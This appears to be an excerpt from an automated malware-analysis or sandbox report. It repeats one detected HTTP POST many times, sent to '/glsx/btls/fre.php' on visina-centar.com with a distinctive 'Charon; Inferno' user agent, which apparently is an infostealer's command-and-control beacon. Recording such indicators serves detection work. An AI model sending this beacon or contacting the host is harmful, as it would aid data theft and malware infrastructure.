            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            S